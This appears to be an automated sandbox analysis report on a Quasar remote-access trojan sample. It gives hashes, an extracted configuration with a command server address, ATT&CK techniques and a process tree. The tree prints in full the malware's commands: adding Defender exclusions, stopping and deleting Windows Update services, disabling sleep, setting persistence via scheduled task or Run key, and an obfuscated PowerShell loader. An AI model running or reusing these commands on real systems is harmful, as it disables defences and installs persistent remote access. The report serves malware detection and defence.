quasar | 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394

Analysis

max time kernel
17s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-12-2024 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
Size

6.0MB
MD5

fcd7f27674626fbf8bcce5b0e991c03d
SHA1

143515e84e3b48e5bc5286d819f8fd10b8eb5685
SHA256

7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394
SHA512

3464f2200c9eedd17872842b2336786360b34a4bb2f0709b29cb1a8f794b437532193275b43378149424e2d651dba66657d850ccb37e613cb73e76d8a36b98f6
SSDEEP

98304:j3Go5BKtxo5fQIwuhk/UwalC+i0bBHXGgjaQx+OhfzTxzdloaDW:j3GozKYAEk9oCj0bR2Ej1hbTxkJ

Score

10^/10

quasar 4drun evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000e000000023b56-20.dat	family_quasar
behavioral2/memory/3252-31-0x0000000000560000-0x00000000005E4000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3036	powershell.exe
3248	powershell.exe
5088	powershell.exe
2108	powershell.exe
1128	powershell.exe
3636	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe

Executes dropped EXE 5 IoCs

pid	Process
1160	doihdjpihrekpoh.exe
5068	mklnsegsd.exe
3252	ergbuiluyfd.exe
4288	Client.exe
4904	kaptsegthwf.exe

Power Settings 1 TTPs 18 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4688	powercfg.exe
1912	powercfg.exe
3924	cmd.exe
1260	powercfg.exe
4564	powercfg.exe
4960	powercfg.exe
3840	powercfg.exe
1028	powercfg.exe
5112	powercfg.exe
4308	powercfg.exe
2880	powercfg.exe
2844	powercfg.exe
2964	powercfg.exe
1616	cmd.exe
1288	powercfg.exe
2368	powercfg.exe
1288	powercfg.exe
1712	powercfg.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	doihdjpihrekpoh.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc32	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1160 set thread context of 1612	1160	doihdjpihrekpoh.exe	143
PID 5068 set thread context of 4828	5068	mklnsegsd.exe	162

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Cuis\bon\Bara.exe	mklnsegsd.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	Process not Found
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3172	sc.exe
3716	sc.exe
2740	sc.exe
3812	sc.exe
3924	sc.exe
1256	sc.exe
4112	sc.exe
4476	sc.exe
2568	sc.exe
1100	sc.exe
3924	sc.exe
4952	sc.exe
2476	sc.exe
3552	sc.exe
220	sc.exe
2384	sc.exe
1008	sc.exe
1180	sc.exe
4612	sc.exe
4520	sc.exe
3612	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4800	schtasks.exe
4964	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
1160	doihdjpihrekpoh.exe
3036	powershell.exe
3036	powershell.exe
3248	powershell.exe
3248	powershell.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1128	powershell.exe
1128	powershell.exe
1160	doihdjpihrekpoh.exe
1128	powershell.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1612	dialer.exe
1612	dialer.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
1160	doihdjpihrekpoh.exe
4904	kaptsegthwf.exe
1612	dialer.exe
1612	dialer.exe
5088	powershell.exe
5088	powershell.exe
4680	powershell.exe
4680	powershell.exe
1612	dialer.exe
1612	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3252	ergbuiluyfd.exe
Token: SeDebugPrivilege	4288	Client.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeShutdownPrivilege	4688	powercfg.exe
Token: SeCreatePagefilePrivilege	4688	powercfg.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeShutdownPrivilege	1912	powercfg.exe
Token: SeCreatePagefilePrivilege	1912	powercfg.exe
Token: SeShutdownPrivilege	4308	powercfg.exe
Token: SeCreatePagefilePrivilege	4308	powercfg.exe
Token: SeShutdownPrivilege	4960	powercfg.exe
Token: SeCreatePagefilePrivilege	4960	powercfg.exe
Token: SeDebugPrivilege	1160	doihdjpihrekpoh.exe
Token: SeDebugPrivilege	1612	dialer.exe
Token: SeShutdownPrivilege	1288	powercfg.exe
Token: SeCreatePagefilePrivilege	1288	powercfg.exe
Token: SeShutdownPrivilege	2880	powercfg.exe
Token: SeCreatePagefilePrivilege	2880	powercfg.exe
Token: SeShutdownPrivilege	3840	powercfg.exe
Token: SeCreatePagefilePrivilege	3840	powercfg.exe
Token: SeShutdownPrivilege	2368	powercfg.exe
Token: SeCreatePagefilePrivilege	2368	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1128	powershell.exe
Token: SeSecurityPrivilege	1128	powershell.exe
Token: SeTakeOwnershipPrivilege	1128	powershell.exe
Token: SeLoadDriverPrivilege	1128	powershell.exe
Token: SeSystemProfilePrivilege	1128	powershell.exe
Token: SeSystemtimePrivilege	1128	powershell.exe
Token: SeProfSingleProcessPrivilege	1128	powershell.exe
Token: SeIncBasePriorityPrivilege	1128	powershell.exe
Token: SeCreatePagefilePrivilege	1128	powershell.exe
Token: SeBackupPrivilege	1128	powershell.exe
Token: SeRestorePrivilege	1128	powershell.exe
Token: SeShutdownPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeSystemEnvironmentPrivilege	1128	powershell.exe
Token: SeRemoteShutdownPrivilege	1128	powershell.exe
Token: SeUndockPrivilege	1128	powershell.exe
Token: SeManageVolumePrivilege	1128	powershell.exe
Token: 33	1128	powershell.exe
Token: 34	1128	powershell.exe
Token: 35	1128	powershell.exe
Token: 36	1128	powershell.exe
Token: SeIncreaseQuotaPrivilege	1128	powershell.exe
Token: SeSecurityPrivilege	1128	powershell.exe
Token: SeTakeOwnershipPrivilege	1128	powershell.exe
Token: SeLoadDriverPrivilege	1128	powershell.exe
Token: SeSystemProfilePrivilege	1128	powershell.exe
Token: SeSystemtimePrivilege	1128	powershell.exe
Token: SeProfSingleProcessPrivilege	1128	powershell.exe
Token: SeIncBasePriorityPrivilege	1128	powershell.exe
Token: SeCreatePagefilePrivilege	1128	powershell.exe
Token: SeBackupPrivilege	1128	powershell.exe
Token: SeRestorePrivilege	1128	powershell.exe
Token: SeShutdownPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeSystemEnvironmentPrivilege	1128	powershell.exe
Token: SeRemoteShutdownPrivilege	1128	powershell.exe
Token: SeUndockPrivilege	1128	powershell.exe
Token: SeManageVolumePrivilege	1128	powershell.exe
Token: 33	1128	powershell.exe
Token: 34	1128	powershell.exe
Token: 35	1128	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
5068	mklnsegsd.exe
4288	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3396 wrote to memory of 1160	3396	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	83
PID 3396 wrote to memory of 1160	3396	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	83
PID 3396 wrote to memory of 5068	3396	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	85
PID 3396 wrote to memory of 5068	3396	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	85
PID 3396 wrote to memory of 3252	3396	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	86
PID 3396 wrote to memory of 3252	3396	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	86
PID 3252 wrote to memory of 4800	3252	ergbuiluyfd.exe	87
PID 3252 wrote to memory of 4800	3252	ergbuiluyfd.exe	87
PID 3252 wrote to memory of 4288	3252	ergbuiluyfd.exe	89
PID 3252 wrote to memory of 4288	3252	ergbuiluyfd.exe	89
PID 4288 wrote to memory of 4964	4288	Client.exe	90
PID 4288 wrote to memory of 4964	4288	Client.exe	90
PID 5068 wrote to memory of 3248	5068	mklnsegsd.exe	106
PID 5068 wrote to memory of 3248	5068	mklnsegsd.exe	106
PID 756 wrote to memory of 3692	756	cmd.exe	112
PID 756 wrote to memory of 3692	756	cmd.exe	112
PID 5068 wrote to memory of 1632	5068	mklnsegsd.exe	114
PID 5068 wrote to memory of 1632	5068	mklnsegsd.exe	114
PID 5068 wrote to memory of 1616	5068	mklnsegsd.exe	115
PID 5068 wrote to memory of 1616	5068	mklnsegsd.exe	115
PID 5068 wrote to memory of 1128	5068	mklnsegsd.exe	118
PID 5068 wrote to memory of 1128	5068	mklnsegsd.exe	118
PID 1632 wrote to memory of 1180	1632	cmd.exe	121
PID 1632 wrote to memory of 1180	1632	cmd.exe	121
PID 1632 wrote to memory of 3612	1632	cmd.exe	122
PID 1632 wrote to memory of 3612	1632	cmd.exe	122
PID 1632 wrote to memory of 1256	1632	cmd.exe	123
PID 1632 wrote to memory of 1256	1632	cmd.exe	123
PID 1616 wrote to memory of 4688	1616	cmd.exe	125
PID 1616 wrote to memory of 4688	1616	cmd.exe	125
PID 1632 wrote to memory of 3172	1632	cmd.exe	166
PID 1632 wrote to memory of 3172	1632	cmd.exe	166
PID 1616 wrote to memory of 1912	1616	cmd.exe	127
PID 1616 wrote to memory of 1912	1616	cmd.exe	127
PID 1632 wrote to memory of 4476	1632	cmd.exe	129
PID 1632 wrote to memory of 4476	1632	cmd.exe	129
PID 1616 wrote to memory of 4308	1616	cmd.exe	132
PID 1616 wrote to memory of 4308	1616	cmd.exe	132
PID 1632 wrote to memory of 1220	1632	cmd.exe	133
PID 1632 wrote to memory of 1220	1632	cmd.exe	133
PID 1616 wrote to memory of 4960	1616	cmd.exe	135
PID 1616 wrote to memory of 4960	1616	cmd.exe	135
PID 1632 wrote to memory of 4008	1632	cmd.exe	137
PID 1632 wrote to memory of 4008	1632	cmd.exe	137
PID 1632 wrote to memory of 4412	1632	cmd.exe	138
PID 1632 wrote to memory of 4412	1632	cmd.exe	138
PID 1160 wrote to memory of 1612	1160	doihdjpihrekpoh.exe	143
PID 1160 wrote to memory of 1612	1160	doihdjpihrekpoh.exe	143
PID 1160 wrote to memory of 1612	1160	doihdjpihrekpoh.exe	143
PID 1160 wrote to memory of 1612	1160	doihdjpihrekpoh.exe	143
PID 1160 wrote to memory of 1612	1160	doihdjpihrekpoh.exe	143
PID 1160 wrote to memory of 1612	1160	doihdjpihrekpoh.exe	143
PID 1160 wrote to memory of 1612	1160	doihdjpihrekpoh.exe	143
PID 1632 wrote to memory of 4984	1632	cmd.exe	148
PID 1632 wrote to memory of 4984	1632	cmd.exe	148
PID 1632 wrote to memory of 4408	1632	cmd.exe	151
PID 1632 wrote to memory of 4408	1632	cmd.exe	151
PID 1612 wrote to memory of 616	1612	dialer.exe	5
PID 1612 wrote to memory of 664	1612	dialer.exe	7
PID 1612 wrote to memory of 956	1612	dialer.exe	12
PID 1612 wrote to memory of 388	1612	dialer.exe	13
PID 1612 wrote to memory of 736	1612	dialer.exe	14
PID 1612 wrote to memory of 1036	1612	dialer.exe	15
PID 1612 wrote to memory of 1056	1612	dialer.exe	17

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:388
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5e788a06-a479-4e38-9c80-cd1e48048a9e}
  2⤵
  PID:2316
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{5723c870-b39a-4859-82b6-7c15f515e097}
  2⤵
  PID:4904
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{5723c870-b39a-4859-82b6-7c15f515e097}
  2⤵
  PID:532

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1212
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:4668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:3172
- C:\Program Files\Cuis\bon\Bara.exe
  "C:\Program Files\Cuis\bon\Bara.exe"
  2⤵
  PID:3696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2108
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4824
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1008
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:3552
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:3924
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5112
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:1712
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:1260
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:4564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3636
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe ujznpffbjbh
    3⤵
    PID:4020
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      PID:2868
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    PID:4432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1528
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1492

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2156

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2172

C:\Windows\system32\svchost.exe
